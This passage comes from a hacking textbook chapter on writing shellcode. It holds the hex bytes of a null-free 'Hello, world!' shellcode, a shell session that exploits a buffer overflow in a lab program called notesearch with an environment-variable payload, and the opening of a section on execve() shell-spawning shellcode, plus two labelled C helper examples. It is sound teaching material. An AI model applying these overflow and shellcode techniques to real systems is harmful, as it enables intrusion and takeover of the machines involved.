After assembling this shellcode, hexdump and grep are used to quickly
check it for null bytes.
reader@hacking:~/booksrc $ nasm helloworld3.s
reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00
00000000 eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 0f cd 80 |..Y1...1.C1.....|
00000010 b0 01 4b cd 80 e8 e8 ff ff ff 48 65 6c 6c 6f 2c |..K.......Hello,|
00000020 20 77 6f 72 6c 64 21 0a 0d | world!..|
00000029
reader@hacking:~/booksrc $
Now this shellcode is usable, as it doesn't contain any null bytes. When
used with an exploit, the notesearch program is coerced into greeting the
world like a newbie.
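The same check, done in C instead of with hexdump and grep. This is an added example, not code from the book: it embeds the 41 bytes of helloworld3 exactly as the hexdump above shows them, plus a constructed sample with the zero-padded 32-bit immediates that a naive mov eax,4 / mov ebx,1 would produce, and reports the exact offsets of any byte you ask about. One caveat worth knowing about the grep approach: grep 00 also matches the offset column of every hexdump line, so it is the --color highlighting, not the line selection, that tells you whether the data bytes themselves contain a null.

```c
#include <stddef.h>
#include <stdio.h>

/* Bytes of helloworld3 exactly as listed in the hexdump (0x29 = 41 bytes). */
static const unsigned char helloworld3[] = {
    0xeb,0x13,0x59,0x31,0xc0,0xb0,0x04,0x31,0xdb,0x43,0x31,0xd2,0xb2,0x0f,0xcd,0x80,
    0xb0,0x01,0x4b,0xcd,0x80,0xe8,0xe8,0xff,0xff,0xff,0x48,0x65,0x6c,0x6c,0x6f,0x2c,
    0x20,0x77,0x6f,0x72,0x6c,0x64,0x21,0x0a,0x0d
};

/* Constructed sample (not from the book): "mov eax,4" and "mov ebx,1" with
   full 32-bit immediates, i.e. the encodings that contain zero bytes. */
static const unsigned char naive_sample[] = {
    0xb8,0x04,0x00,0x00,0x00,  0xbb,0x01,0x00,0x00,0x00
};

/* Count the bytes in buf equal to `bad`, storing their offsets in out (at most
   max_out of them). The return value is the total count even when more than
   max_out offsets were found, so a caller can detect truncation. */
size_t find_byte(const unsigned char *buf, size_t len, unsigned char bad,
                 size_t *out, size_t max_out)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == bad) {
            if (n < max_out)
                out[n] = i;
            n++;
        }
    }
    return n;
}

/* Print a hexdump -C style listing in which every byte equal to `bad` is
   wrapped in brackets, so the offending bytes stand out without colour. */
void hexdump_marked(const unsigned char *buf, size_t len, unsigned char bad)
{
    for (size_t off = 0; off < len; off += 16) {
        printf("%08zx ", off);
        for (size_t i = 0; i < 16; i++) {
            if (off + i >= len)
                printf("    ");
            else if (buf[off + i] == bad)
                printf("[%02x]", buf[off + i]);
            else
                printf(" %02x ", buf[off + i]);
        }
        printf(" |");
        for (size_t i = 0; i < 16 && off + i < len; i++) {
            unsigned char c = buf[off + i];
            putchar((c >= 32 && c < 127) ? c : '.');
        }
        puts("|");
    }
}

int main(void)
{
    size_t offsets[16];
    size_t n;

    n = find_byte(helloworld3, sizeof helloworld3, 0x00, offsets, 16);
    printf("helloworld3: %zu byte(s), %zu null(s)\n", sizeof helloworld3, n);
    hexdump_marked(helloworld3, sizeof helloworld3, 0x00);

    n = find_byte(naive_sample, sizeof naive_sample, 0x00, offsets, 16);
    printf("\nnaive sample: %zu null(s) at offsets:", n);
    for (size_t i = 0; i < n && i < 16; i++)
        printf(" %zu", offsets[i]);
    putchar('\n');
    hexdump_marked(naive_sample, sizeof naive_sample, 0x00);
    return 0;
}
```

Passing a different value for `bad` (0x0a, for instance) finds other bytes that a particular input path might reject, which is the same question the text asks about 0x00.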
reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld3)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9bc
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
Hello, world!
reader@hacking:~/booksrc $
0x530 Shell-Spawning Shellcode
Now that you've learned how to make system calls and avoid null bytes, all
sorts of shellcodes can be constructed. To spawn a shell, we just need to make
a system call to execute the /bin/sh shell program. System call number 11,
execve(), is similar to the C execute() function that we used in the previous
chapters.
EXECVE(2) Linux Programmer's Manual EXECVE(2)
NAME
execve - execute program
SYNOPSIS
#include <unistd.h>
int execve(const char *filename, char *const argv[],
           char *const envp[]);
DESCRIPTION
execve() executes the program pointed to by filename. Filename must be
either a binary executable, or a script starting with a line of the
form "#! interpreter [arg]". In the latter case, the interpreter must
be a valid pathname for an executable which is not itself a script,
which will be invoked as interpreter [arg] filename.
argv is an array of argument strings passed to the new program. envp
is an array of strings, conventionally of the form key=value, which are
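Before encoding the call as system call number 11, it helps to see what the three arguments of execve() do from plain C. This is an added example, not code from the book: it forks, calls execve() in the child with an explicit argv and envp, and hands back the child's exit status, so the effect of each argument (the program path, argv[0] and the rest of the argument list, and an environment that is exactly what you pass and nothing more) can be observed directly. The helper names run_with_execve, sh_exit_code and try_exec are this example's own.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork, execve() `path` in the child with the given argv/envp, and return the
   child's exit status. execve() only returns on failure; in that case the
   child reports why and exits with 127, as a shell does for a missing
   command. Returns -1 if fork()/waitpid() fail or the child died by signal. */
int run_with_execve(const char *path, char *const argv[], char *const envp[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, envp);
        fprintf(stderr, "execve(%s): %s\n", path, strerror(errno));
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Run "/bin/sh -c command". envvar is either NULL (completely empty
   environment) or a single "KEY=value" string that becomes the whole
   environment of the new program. Returns the command's exit code. */
int sh_exit_code(const char *command, const char *envvar)
{
    char *const argv[] = { "/bin/sh", "-c", (char *)command, NULL };
    char *const envp[] = { (char *)envvar, NULL };   /* envvar == NULL -> {NULL} */
    return run_with_execve("/bin/sh", argv, envp);
}

/* Try to execute `path` directly with argv = { path, NULL } and no
   environment. A path that does not exist yields 127 from the child. */
int try_exec(const char *path)
{
    char *const argv[] = { (char *)path, NULL };
    char *const envp[] = { NULL };
    return run_with_execve(path, argv, envp);
}

int main(void)
{
    printf("exit 7                -> %d\n", sh_exit_code("exit 7", NULL));
    printf("MYVAR set             -> %d\n",
           sh_exit_code("test \"$MYVAR\" = hello", "MYVAR=hello"));
    printf("MYVAR unset           -> %d\n",
           sh_exit_code("test \"$MYVAR\" = hello", NULL));
    printf("missing program       -> %d\n", try_exec("/nonexistent/program"));
    return 0;
}
```

Note that both arrays must end with a NULL pointer; that terminator is what the kernel walks to, and the later shellcode has to build the same two NULL-terminated arrays in memory before issuing the system call.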